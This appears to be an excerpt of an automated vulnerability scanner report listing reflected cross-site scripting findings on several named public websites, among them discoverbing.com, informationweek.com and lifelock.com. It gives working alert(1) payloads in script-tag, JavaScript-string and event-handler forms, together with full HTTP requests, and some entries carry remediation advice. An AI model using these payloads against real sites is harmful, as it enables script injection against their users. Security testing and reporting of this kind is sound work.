The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5945"><script>alert(1)</script>96d473a90ab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Activities/BeEntertained?e5945"><script>alert(1)</script>96d473a90ab=1 HTTP/1.1 Host: www.discoverbing.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vnum=1306159250097%26vn%3D1; ASP.NET_SessionId=qf0g0pi5nac2fyresp0selyq; 081c924b-ddfd-447a-8c7a-2db01211cae7=%7B%22parent_id%22%3A%22%22%2C%22referrer%22%3A%22%22%2C%22id%22%3A%220J2F1ltJ97i%22%2C%22wom%22%3Afalse%2C%22entry_point%22%3A%22http%3A%2F%2Fwww.discoverbing.com%2Fmobile%2Findex.html%22%2C%22url_tag%22%3A%22NOMTAG%22%7D; s_cc=true; s_invisit=true; s_nr=1303569652387; s_sq=%5B%5BB%5D%5D
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> ...[SNIP]... <a id="global-nav-share-facebookshare" href="http://www.facebook.com/sharer.php?u=http://www.discoverbing.com/Activities/BeEntertained?e5945"><script>alert(1)</script>96d473a90ab=1&fbshare=true&t=Look+what+I+discovered+about+staying+entertained+with+Bing+on+DiscoverBing" target="_blank"> ...[SNIP]...
2.47. http://www.discoverbing.com/Activities/BeHealthy [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.discoverbing.com
Path:
/Activities/BeHealthy
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d26e8"><script>alert(1)</script>f6b006dd9db was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Activities/BeHealthy?d26e8"><script>alert(1)</script>f6b006dd9db=1 HTTP/1.1 Host: www.discoverbing.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vnum=1306159250097%26vn%3D1; ASP.NET_SessionId=qf0g0pi5nac2fyresp0selyq; 081c924b-ddfd-447a-8c7a-2db01211cae7=%7B%22parent_id%22%3A%22%22%2C%22referrer%22%3A%22%22%2C%22id%22%3A%220J2F1ltJ97i%22%2C%22wom%22%3Afalse%2C%22entry_point%22%3A%22http%3A%2F%2Fwww.discoverbing.com%2Fmobile%2Findex.html%22%2C%22url_tag%22%3A%22NOMTAG%22%7D; s_cc=true; s_invisit=true; s_nr=1303569646617; s_sq=%5B%5BB%5D%5D
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> ...[SNIP]... <a id="global-nav-share-facebookshare" href="http://www.facebook.com/sharer.php?u=http://www.discoverbing.com/Activities/BeHealthy?d26e8"><script>alert(1)</script>f6b006dd9db=1&fbshare=true&t=Look+what+I+discovered+on+Bing" target="_blank"> ...[SNIP]...
2.48. http://www.discoverbing.com/Activities/BePrepared [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.discoverbing.com
Path:
/Activities/BePrepared
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30806"><script>alert(1)</script>02794a1d94 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Activities/BePrepared?30806"><script>alert(1)</script>02794a1d94=1 HTTP/1.1 Host: www.discoverbing.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vnum=1306159250097%26vn%3D1; ASP.NET_SessionId=qf0g0pi5nac2fyresp0selyq; 081c924b-ddfd-447a-8c7a-2db01211cae7=%7B%22parent_id%22%3A%22%22%2C%22referrer%22%3A%22%22%2C%22id%22%3A%220J2F1ltJ97i%22%2C%22wom%22%3Afalse%2C%22entry_point%22%3A%22http%3A%2F%2Fwww.discoverbing.com%2Fmobile%2Findex.html%22%2C%22url_tag%22%3A%22NOMTAG%22%7D; s_cc=true; s_invisit=true; s_nr=1303569649149; s_sq=%5B%5BB%5D%5D
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> ...[SNIP]... <a id="global-nav-share-facebookshare" href="http://www.facebook.com/sharer.php?u=http://www.discoverbing.com/Activities/BePrepared?30806"><script>alert(1)</script>02794a1d94=1&fbshare=true&t=Look+what+I+discovered+on+Bing" target="_blank"> ...[SNIP]...
2.49. http://www.discoverbing.com/Activities/FindFlights [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.discoverbing.com
Path:
/Activities/FindFlights
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d0db"><script>alert(1)</script>68fb85687a8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Activities/FindFlights?3d0db"><script>alert(1)</script>68fb85687a8=1 HTTP/1.1 Host: www.discoverbing.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vnum=1306159250097%26vn%3D1; ASP.NET_SessionId=qf0g0pi5nac2fyresp0selyq; 081c924b-ddfd-447a-8c7a-2db01211cae7=%7B%22parent_id%22%3A%22%22%2C%22referrer%22%3A%22%22%2C%22id%22%3A%220J2F1ltJ97i%22%2C%22wom%22%3Afalse%2C%22entry_point%22%3A%22http%3A%2F%2Fwww.discoverbing.com%2Fmobile%2Findex.html%22%2C%22url_tag%22%3A%22NOMTAG%22%7D; s_cc=true; s_invisit=true; s_nr=1303569642930; s_sq=%5B%5BB%5D%5D
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> ...[SNIP]... <a id="global-nav-share-facebookshare" href="http://www.facebook.com/sharer.php?u=http://www.discoverbing.com/Activities/FindFlights?3d0db"><script>alert(1)</script>68fb85687a8=1&fbshare=true&t=Look+what+I+discovered+on+Bing" target="_blank"> ...[SNIP]...
2.50. http://www.discoverbing.com/Activities/MakeLocalPlans [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.discoverbing.com
Path:
/Activities/MakeLocalPlans
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e0f1f"><script>alert(1)</script>2357e1c84b7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Activities/MakeLocalPlans?e0f1f"><script>alert(1)</script>2357e1c84b7=1 HTTP/1.1 Host: www.discoverbing.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vnum=1306159250097%26vn%3D1; ASP.NET_SessionId=qf0g0pi5nac2fyresp0selyq; 081c924b-ddfd-447a-8c7a-2db01211cae7=%7B%22parent_id%22%3A%22%22%2C%22referrer%22%3A%22%22%2C%22id%22%3A%220J2F1ltJ97i%22%2C%22wom%22%3Afalse%2C%22entry_point%22%3A%22http%3A%2F%2Fwww.discoverbing.com%2Fmobile%2Findex.html%22%2C%22url_tag%22%3A%22NOMTAG%22%7D; s_cc=true; s_invisit=true; s_nr=1303569651293; s_sq=%5B%5BB%5D%5D
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> ...[SNIP]... <a id="global-nav-share-facebookshare" href="http://www.facebook.com/sharer.php?u=http://www.discoverbing.com/Activities/MakeLocalPlans?e0f1f"><script>alert(1)</script>2357e1c84b7=1&fbshare=true&t=Look+what+I+discovered+on+Bing" target="_blank"> ...[SNIP]...
2.51. http://www.discoverbing.com/Activities/SocialSearch [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.discoverbing.com
Path:
/Activities/SocialSearch
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7223"><script>alert(1)</script>485a36705a7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Activities/SocialSearch?b7223"><script>alert(1)</script>485a36705a7=1 HTTP/1.1 Host: www.discoverbing.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> ...[SNIP]... <a id="global-nav-share-facebookshare" href="http://www.facebook.com/sharer.php?u=http://www.discoverbing.com/Activities/SocialSearch?b7223"><script>alert(1)</script>485a36705a7=1&fbshare=true&t=Look+what+I+discovered+on+Bing" target="_blank"> ...[SNIP]...
2.52. http://www.discoverbing.com/facebook [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.discoverbing.com
Path:
/facebook
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84344"><script>alert(1)</script>8123e66d22e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /facebook?84344"><script>alert(1)</script>8123e66d22e=1 HTTP/1.1 Host: www.discoverbing.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9dfae"-alert(1)-"ff46e1e7966 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /9dfae"-alert(1)-"ff46e1e7966?_=1303613718975&redirectTo=http%3A%2F%2Fwww.informationweek.com%2Fnews%2Fsecurity%2Fattacks%2F229402094 HTTP/1.1 Host: www.informationweek.com Proxy-Connection: keep-alive Referer: http://www.informationweek.com/news/security/attacks/229402094 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Content-Type: application/x-www-form-urlencoded Accept: application/json, text/javascript, */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 613bc"><script>alert(1)</script>5ef418a1482 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /613bc"><script>alert(1)</script>5ef418a1482?_=1303613718975&redirectTo=http%3A%2F%2Fwww.informationweek.com%2Fnews%2Fsecurity%2Fattacks%2F229402094 HTTP/1.1 Host: www.informationweek.com Proxy-Connection: keep-alive Referer: http://www.informationweek.com/news/security/attacks/229402094 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Content-Type: application/x-www-form-urlencoded Accept: application/json, text/javascript, */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5818f"><script>alert(1)</script>904650c8cb7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 12d21"-alert(1)-"821c5415bb9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fccb4'-alert(1)-'124152fd938 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fcefe"><script>alert(1)</script>fe5ee48cf1c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b5608"-alert(1)-"9829f497abd840a41 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cfd82"><script>alert(1)</script>d594c72fda68b16a9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a06c"><script>alert(1)</script>3049035ccd1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8f343'-alert(1)-'aacdbbd961676d23c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 366bd"-alert(1)-"ffc1f1a20a6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news366bd"-alert(1)-"ffc1f1a20a6/security/attacks/229402094 HTTP/1.1 Host: www.informationweek.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4ee7"><script>alert(1)</script>dd771e651e7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /newsb4ee7"><script>alert(1)</script>dd771e651e7/security/attacks/229402094 HTTP/1.1 Host: www.informationweek.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cbd2b'%3balert(1)//b3ccf1b55bd was submitted in the REST URL parameter 2. This input was echoed as cbd2b';alert(1)//b3ccf1b55bd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/securitycbd2b'%3balert(1)//b3ccf1b55bd/attacks/229402094 HTTP/1.1 Host: www.informationweek.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d09f"><script>alert(1)</script>4c2297b99c1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/security4d09f"><script>alert(1)</script>4c2297b99c1/attacks/229402094 HTTP/1.1 Host: www.informationweek.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24e0b"><script>alert(1)</script>572ee684acc was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/security/attacks24e0b"><script>alert(1)</script>572ee684acc/229402094 HTTP/1.1 Host: www.informationweek.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... s_button_stumbleupon at300b" href="http://www.addthis.com/bookmark.php?v=250&winname=addthis&pub=InformationWeek&source=tbx-250&lng=en-US&s=stumbleupon&url=www.informationweek.com/news/security/attacks24e0b"><script>alert(1)</script>572ee684acc/229402094&title=Hacking Becomes Leading Cause Of Data Breaches -- InformationWeek&ate=AT-InformationWeek/-/-/4d22a657185bdbc2/1&sms_ss=1&at_xt=1&CXNID=2000001.5215456080540439074NXC&pre=www.informatio ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2a4de'%3balert(1)//79f1e066e0e was submitted in the REST URL parameter 3. This input was echoed as 2a4de';alert(1)//79f1e066e0e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/security/attacks2a4de'%3balert(1)//79f1e066e0e/229402094 HTTP/1.1 Host: www.informationweek.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1866f'-alert(1)-'296c5fdde43 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/security/attacks/2294020941866f'-alert(1)-'296c5fdde43 HTTP/1.1 Host: www.informationweek.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92353"><a>cdbf7e70e0d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /news/security/attacks/22940209492353"><a>cdbf7e70e0d HTTP/1.1 Host: www.informationweek.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the promocode request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5e581"><script>alert(1)</script>1b0afbbb73d was submitted in the promocode parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?promocode=GOOGSEARCH135e581"><script>alert(1)</script>1b0afbbb73d&c3metrics=3114&gclid=CNG9kumTtKgCFUNd5Qod6WW7Cw HTTP/1.1 Host: www.lifelock.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e0912"><img%20src%3da%20onerror%3dalert(1)>1155d91a54e was submitted in the REST URL parameter 1. This input was echoed as e0912"><img src=a onerror=alert(1)>1155d91a54e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /index.phpe0912"><img%20src%3da%20onerror%3dalert(1)>1155d91a54e HTTP/1.1 Host: www.mister-wong.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Sat, 23 Apr 2011 14:27:40 GMT Server: Apache Set-Cookie: wongsess=65fa81b50439e24c66611f40a38c133b; expires=Tue, 22-Apr-2036 20:27:40 GMT; path=/ P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Vary: Accept-Encoding Content-Length: 5168 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9b33a"><script>alert(1)</script>b562ccaade5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
